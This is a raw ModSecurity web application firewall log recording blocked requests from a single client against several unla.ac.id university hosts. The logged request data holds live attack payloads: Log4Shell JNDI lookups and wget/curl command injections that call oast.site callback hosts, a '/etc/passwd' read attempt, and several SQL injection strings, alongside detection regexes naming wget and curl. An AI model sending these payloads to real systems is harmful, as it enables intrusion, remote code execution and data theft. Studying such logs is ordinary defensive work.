[Tue Aug 29 11:31:36.325676 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQUH-UAAAA2"]
[Tue Aug 29 11:31:36.329245 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgshrnbeydszm1c.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAN@5G4AAAAO"]
[Tue Aug 29 11:31:36.329642 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQmR3YAAAAH"]
[Tue Aug 29 11:31:36.352795 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQJWvAAAAAr"]
[Tue Aug 29 11:31:36.355817 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQmR3cAAAAH"]
[Tue Aug 29 11:31:36.360788 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlg6d6ajyhpb5hnz.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAANsATQAAAAD"]
[Tue Aug 29 11:31:36.361019 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10qMCo-f0AAAQKOdAAAAAs"]
[Tue Aug 29 11:31:36.362378 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgwxd13a6ank7ko.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAPah1AAAAAL"]
[Tue Aug 29 11:31:36.381216 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgyebymh6xuzc1a.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQMrtwAAAAu"]
[Tue Aug 29 11:31:36.404016 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQMrt0AAAAu"]
[Tue Aug 29 11:31:37.338948 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAP@M04AAAAZ"]
[Tue Aug 29 11:31:37.345055 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQkBWcAAAAC"]
[Tue Aug 29 11:31:37.367362 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAPah1QAAAAL"]
[Tue Aug 29 11:31:37.371020 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qcCo-f0AAAQJWvMAAAAr"]
[Tue Aug 29 11:31:37.376414 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAP@M08AAAAZ"]
[Tue Aug 29 11:31:37.401078 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAQMrt8AAAAu"]
[Tue Aug 29 11:31:37.404274 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAQEGLkAAAAm"]
[Tue Aug 29 11:31:37.407607 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQmR3wAAAAH"]
[Tue Aug 29 11:31:37.429892 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlg81ejqg5zttxgc.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qcCo-f0AAAN@5HUAAAAO"]
[Tue Aug 29 11:31:37.442391 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAP@M1EAAAAZ"]
[Tue Aug 29 11:31:37.458645 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAN@5HYAAAAO"]
[Tue Aug 29 11:31:37.458715 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAANsATsAAAAD"]
[Tue Aug 29 11:31:38.300198 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgmdz664e65qu1w.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAANsAT0AAAAD"]
[Tue Aug 29 11:31:38.303139 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgqy4g8ckhu4ssm.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAP@M1MAAAAZ"]
[Tue Aug 29 11:31:38.306727 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgx6qdz5kzdb574.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQMruMAAAAu"]
[Tue Aug 29 11:31:38.310723 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgw19wt7tdesqsa.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQEGLsAAAAm"]
[Tue Aug 29 11:31:38.327292 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgf5zfjdac5n1sy.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQlGRYAAAAF"]
[Tue Aug 29 11:31:38.455511 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qsCo-f0AAAQMruQAAAAu"]
[Tue Aug 29 11:31:38.499479 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAPiBjwAAAAB"]
[Tue Aug 29 11:31:38.500904 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgsqexn3n76qws3.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQlGRkAAAAF"]
